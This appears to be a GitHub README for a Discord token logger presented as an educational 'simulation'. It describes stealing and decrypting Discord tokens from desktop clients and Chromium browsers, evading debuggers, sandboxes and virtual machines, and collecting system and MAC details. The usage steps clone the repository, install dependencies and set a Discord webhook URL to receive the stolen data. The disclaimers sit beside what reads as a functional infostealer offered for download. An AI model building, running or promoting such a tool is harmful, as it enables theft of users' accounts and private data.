A simulated Discord token logger made for educational, awareness, and research purposes.
This project helps demonstrate how token theft works β empowering developers and defenders to build better protection.
β οΈ This repository is intended strictly for ethical and educational use.
β Do NOT deploy, distribute, or use this tool on systems or accounts you do not own or have explicit permission to analyze.
π§ββοΈ Misuse of this project may be illegal under local and international law.
This project simulates a Discord token logger. It shows how a malicious actor could extract and exfiltrate user tokens and basic metadata from browsers and local files using:
- Discord desktop installations
- Chromium-based browsers (e.g., Chrome, Edge, Brave)
- Encrypted token storage using Windows APIs
- π Extract and decrypt Discord tokens stored on disk
- π Anti-debugging & sandbox detection
- π§ͺ Virtual machine awareness
- ποΈ Supports major Chromium-based browsers and Discord clients
- π» System user, environment, and MAC info grabbing
- Windows OS
- Python 3.8+
pip install pycryptodome pyperclip pillow pypiwin32
π§ͺ Usage
Clone this repo:
git clone https://github.com/deadconvicess/Token-Logger-Script
cd Token-Logger-Script
Open main.py and replace the webhook URL:
WEBHOOK_URL = "https://your.discord.webhook.url"
Run the script in a controlled test environment:
π Warning: Only run this script in a safe, isolated environment. You are responsible for how you use it.
π§ Learning Objectives
This simulation was made to:
Show how easy it is to extract credentials stored insecurely
Help blue teams detect and defend against token theft
Encourage responsible handling of sensitive local data
Raise awareness of endpoint security risks
This project is licensed under the MIT License.
β Credits
Created by deadconvicess
Inspired by real-world malware to aid cybersecurity education.
π‘ If you found this useful, give it a β on GitHub to support ethical security research.